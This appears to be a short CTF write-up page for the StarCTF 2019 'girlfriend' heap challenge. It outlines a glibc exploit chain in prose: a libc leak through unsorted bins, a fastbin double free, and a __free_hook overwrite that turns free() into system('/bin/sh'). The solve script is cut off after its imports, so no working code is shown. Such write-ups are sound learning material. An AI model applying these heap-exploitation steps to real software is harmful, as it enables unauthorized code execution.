StarCTF 2019: girlfriend

I long for love, but also like single life. But it's a little difficult to find a girlfriend by playing CTF.

TL;DR

Classic LIBC leak via Unsorted Bins' read primitive into Fastbins' Double Free write primitive to achieve code execution by overwriting __free_hook.

Challenge Overview

This is a challenge from 2019, but I'm solving this in 2025 to learn more about heap exploitation.

Stage 1: LIBC Leak via Unsorted Bins

Stage 2: Double Free

Stage 3: Code Execution

According to this article, there are a couple of interesting targets that we can consider overwriting, one of which is __free_hook, which only works on GLIBC <= 2.33.

When __free_hook is executed, the argument to free() will be passed to system(). If we can allocate a chunk and place the string /bin/sh in it, calling free on that chunk will effectively call system("/bin/sh") to get a shell.

Solution

solve.py

#!/usr/bin/python 

from pwn import *

PreviousBinary Exploitation NextCYDES 2025: note(ify)

Last updated 8 hours ago